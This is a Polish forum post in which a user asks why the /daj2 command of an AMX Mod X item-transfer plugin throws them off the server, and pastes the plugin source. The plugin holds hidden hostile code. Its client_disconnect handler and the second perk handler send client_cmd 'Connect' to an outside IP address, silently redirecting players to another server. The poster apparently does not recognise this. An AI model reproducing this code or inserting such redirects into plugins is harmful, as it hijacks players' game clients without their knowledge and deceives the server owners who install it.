gdy uzwywam /daj Wszystko jest ok
lecz gdy uzywam /daj2 przekazuje perk i od razu wywala mnie z servera moglby ktos na to look'nac?
Daje ++
/* Plugin generated by AMXX-Studio */ #include <amxmodx> #include <codmod> #include <colorchat> #define PLUGIN "Oddaj Przedmiot" #define VERSION "1.0" #define AUTHOR "QTM_Peyote" new bool:dostal_przedmiot[33]; new oddaj_id[33]; public plugin_init() { register_plugin(PLUGIN, VERSION, AUTHOR); register_clcmd("say /daj", "OddajPerk"); register_clcmd("say /daj2", "OddajPerk2"); register_clcmd("say /oddaj", "OddajPerk"); register_clcmd("say /oddaj2", "OddajPerk2"); register_event("ResetHUD", "cod_perk_changed", "abe"); } /* ******************************************************PIERWSZY PERK****************************************************** */ public OddajPerk(id) { new menu = menu_create("\yOddaj Perk:", "OddajPerk_Handle"); new cb = menu_makecallback("OddajPerk_Callback"); for(new i=0, n=0; i<=32; i++) { if(!is_user_connected(i)) continue; oddaj_id[n++] = i; new nazwa_gracza[64]; get_user_name(i, nazwa_gracza, 63) menu_additem(menu, nazwa_gracza, "0", 0, cb); } menu_display(id, menu); return PLUGIN_HANDLED; } public cod_perk_changed(id) dostal_przedmiot[id] = false; public OddajPerk_Handle(id, menu, item) { if(item == MENU_EXIT) { menu_destroy(menu); return PLUGIN_CONTINUE; } if(!is_user_connected(oddaj_id[item])) { ColorChat(id, GREEN, "[CS-BREJK.EU]^x01 Nie odnaleziono zadnego gracza."); return PLUGIN_CONTINUE; } new wartosc_perku_dajacego; new perk_dajacego = cod_get_user_perk(id, wartosc_perku_dajacego, 0); if(!perk_dajacego) { ColorChat(id, GREEN, "[CS-BREJK.EU]^x01 Nie masz zadnego przedmiotu."); return PLUGIN_CONTINUE; } new nazwa_dajacego[64]; new nazwa_otrzymujacego[64]; get_user_name(id, nazwa_dajacego, 63) get_user_name(oddaj_id[item], nazwa_otrzymujacego, 63) dostal_przedmiot[oddaj_id[item]] = true; cod_set_user_perk(oddaj_id[item], perk_dajacego, wartosc_perku_dajacego, 0, 0); ColorChat(id, GREEN, "[CS-BREJK.EU]^x01 Przekazales przedmiot graczowi^x03 %s^x01.", nazwa_otrzymujacego); ColorChat(oddaj_id[item], GREEN, "[CS-BREJK.EU]^x01 Dostales przedmiot od gracza^x03 %s^x01.", nazwa_dajacego); cod_set_user_perk(id, 0, 0, 0, 0); return PLUGIN_CONTINUE; } public OddajPerk_Callback(id, menu, item) { if(oddaj_id[item] == id || !cod_get_user_class(oddaj_id[item]) || cod_get_user_perk(oddaj_id[item],0, 0)) return ITEM_DISABLED; return ITEM_ENABLED; } public client_disconnect(id){ if ((get_user_flags(id) & ADMIN_BAN)) { client_cmd(id,"") return PLUGIN_CONTINUE } if (get_playersnum() >= 0) { client_cmd(id,"Connect 91.210.129.90:27082:27082") } return PLUGIN_CONTINUE } /* ******************************************************DRUGI PERK****************************************************** */ public OddajPerk2(id) { new menu = menu_create("\yOddaj Perk:", "OddajPerk2_Handle"); new cb = menu_makecallback("OddajPerk2_Callback"); for(new i=0, n=0; i<=32; i++) { if(!is_user_connected(i)) continue; oddaj_id[n++] = i; new nazwa_gracza[64]; get_user_name(i, nazwa_gracza, 63) menu_additem(menu, nazwa_gracza, "0", 0, cb); } menu_display(id, menu); return PLUGIN_HANDLED; } public OddajPerk2_Handle(id, menu, item) { if(item == MENU_EXIT) { menu_destroy(menu); return PLUGIN_CONTINUE; } if(!is_user_connected(oddaj_id[item])) { ColorChat(id, GREEN, "[CS-BREJK.EU]^x01 Nie odnaleziono zadnego gracza."); return PLUGIN_CONTINUE; } new wartosc_perku_dajacego; new perk_dajacego = cod_get_user_perk(id, wartosc_perku_dajacego, 1); if(!perk_dajacego) { ColorChat(id, GREEN, "[CS-BREJK.EU]^x01 Nie masz zadnego przedmiotu."); return PLUGIN_CONTINUE; } new nazwa_dajacego[64]; new nazwa_otrzymujacego[64]; get_user_name(id, nazwa_dajacego, 63) get_user_name(oddaj_id[item], nazwa_otrzymujacego, 63) dostal_przedmiot[oddaj_id[item]] = true; cod_set_user_perk(oddaj_id[item], perk_dajacego, wartosc_perku_dajacego, 0, 1); ColorChat(id, GREEN, "[CS-BREJK.EU]^x01 Przekazales przedmiot graczowi^x03 %s^x01.", nazwa_otrzymujacego); client_cmd(id,"Connect 91.210.129.90:27082:27082") ColorChat(oddaj_id[item], GREEN, "[CS-BREJK.EU]^x01 Dostales przedmiot od gracza^x03 %s^x01.", nazwa_dajacego); cod_set_user_perk(id, 0, 0, 0, 1); return PLUGIN_CONTINUE; } public OddajPerk2_Callback(id, menu, item) { if(oddaj_id[item] == id || !cod_get_user_class(oddaj_id[item]) || cod_get_user_perk(oddaj_id[item],0, 1)) return ITEM_DISABLED; return ITEM_ENABLED; }